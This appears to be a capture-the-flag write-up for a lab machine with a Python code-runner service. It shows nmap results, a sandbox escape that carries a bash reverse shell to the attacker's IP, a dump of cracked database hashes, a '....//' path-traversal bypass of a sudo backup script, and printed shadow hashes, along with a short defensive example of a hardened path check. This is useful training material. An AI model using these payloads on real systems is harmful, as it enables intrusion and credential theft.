Basic information

Port scan

22 and 5000:

$ nmap -sC -sV -Pn 10.10.11.62
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-24 13:56 CST
Nmap scan report for 10.10.11.62
Host is up (0.066s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 b5:b9:7c:c4:50:32:95:bc:c2:65:17:df:51:a2:7a:bd (RSA)
| 256 94:b5:25:54:9b:68:af:be:40:e1:1d:a8:6b:85:0d:01 (ECDSA)
|_ 256 12:8c:dc:97:ad:86:00:b4:88:e2:29:cf:69:b5:65:96 (ED25519)
5000/tcp open http Gunicorn 20.0.4
|_http-title: Python Code Editor
|_http-server-header: gunicorn/20.0.4
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 32.04 seconds

5000

An online code runner:

Code Runner & user flag

There is keyword filtering:

A basic bypass:

# index 317 is popen
().__class__.__base__.__subclasses__()[317](["/bin/bash","-c","bash -i >& /dev/tcp/10.10.14.12/4444 0>&1"])

This gives a shell as app-production:

database.db

A database file can be found in the app directory; dumping its contents yields hashes, which are then cracked:

app-production@code:~/app/instance$ sqlite3 ./database.db

sqlite> select * from user;
1|development|759b74ce43947f5f4c91aeddc3e5bad3
2|martin|3de6f30c4a09c27fc71932bfc68474be

development
nafeelswordsmaster

martin

Logging in as martin with the recovered password, sudo shows a backup-related script can be run:

Reading the code: it performs the backup according to task.json and checks the paths, stripping "../" from the entries in directories_to_archive and then testing whether the result starts with the permitted path:

However, the replacement is performed only once, so it can be bypassed by doubling the sequence.
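The flawed check and a corrected one side by side, as an added example written for this writeup (not the box's own backy.sh): the single-pass strip lets a doubled sequence survive as a live ".." segment, while canonicalizing before the containment test does not. ALLOWED_ROOTS and the function names are assumptions.

```python
import posixpath

# Constructed for this example: the roots a backup job is allowed to read from.
ALLOWED_ROOTS = ("/var/", "/home/")


def sanitize_once(path: str) -> str:
    """Single-pass removal of '../', as the flawed filter in the writeup does."""
    return path.replace("../", "")


def vulnerable_check(path: str) -> bool:
    """Flawed check: strip '../' in one pass, then compare the *string* prefix."""
    return sanitize_once(path).startswith(ALLOWED_ROOTS)


def effective_target(path: str) -> str:
    """The directory the filesystem actually resolves after the single-pass strip."""
    return posixpath.normpath(sanitize_once(path))


def hardened_check(path: str) -> bool:
    """Fixed check: canonicalize first, then test containment on the result.

    normpath collapses '..' lexically; on a real host use os.path.realpath so
    symlinks are resolved too (omitted here so the example runs offline).
    """
    if not posixpath.isabs(path):
        return False
    resolved = posixpath.normpath(path)
    # commonpath() == root means the resolved path lies inside that root.
    return any(
        posixpath.commonpath([resolved, root]) == root.rstrip("/")
        for root in ALLOWED_ROOTS
    )


if __name__ == "__main__":
    for p in ("/var/../root/", "/var/....//root/", "/home/martin/../../root"):
        print(f"{p:26} naive={vulnerable_check(p)!s:5} "
              f"archives={effective_target(p):15} hardened={hardened_check(p)}")
```

For "/var/....//root/" the naive filter accepts the string, but the backup actually archives "/root"; the hardened check still accepts it only because, unstripped, it names a literal directory called "...." under /var, which is exactly what the caller asked for.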

Privilege escalation & root flag

Using the original task.json as a template, write a modified copy, run it, and back up the root directory:

sudo /usr/bin/backy.sh miao.json
tar -xvjf code_var_.._root_2025_March.tar.bz2

miao.json

{
  "destination": "/home/martin/backups/",
  "multiprocessing": true,
  "verbose_log": true,
  "directories_to_archive": [
    "/var/....//root/"
  ]
}

shadow

root:$6$UHZYd6beZ0z/jb9q$9dEz/1pi4fnVirs9VuURIvU0X/PO321dFctbLr3EBeeii31EZ7OjetlzaiHMZa5HC6jJEN5FWLva/oisCnc4D1:19931:0:99999:7:::
app-production:$6$HjHAfjyM/2n2iItl$.So3HPNRtfPFQlcRvRPYpVzro48elIVza8GdeOVIzd47zJLP7QibwcVh8NIUxttofJiBGS1b36tiVuNoaEyMU0:19931:0:99999:7:::
martin:$6$wSHwZeJrAIh31tGN$1aAHjOgCNDWuEOpzMydwUp4GbiguXz02L8i8YBC.yd7YQ4BZbOr/VMBjzzjTdMVoAnr37omZ/HJXMy.JBIfZ3.:19962:0:99999:7:::

References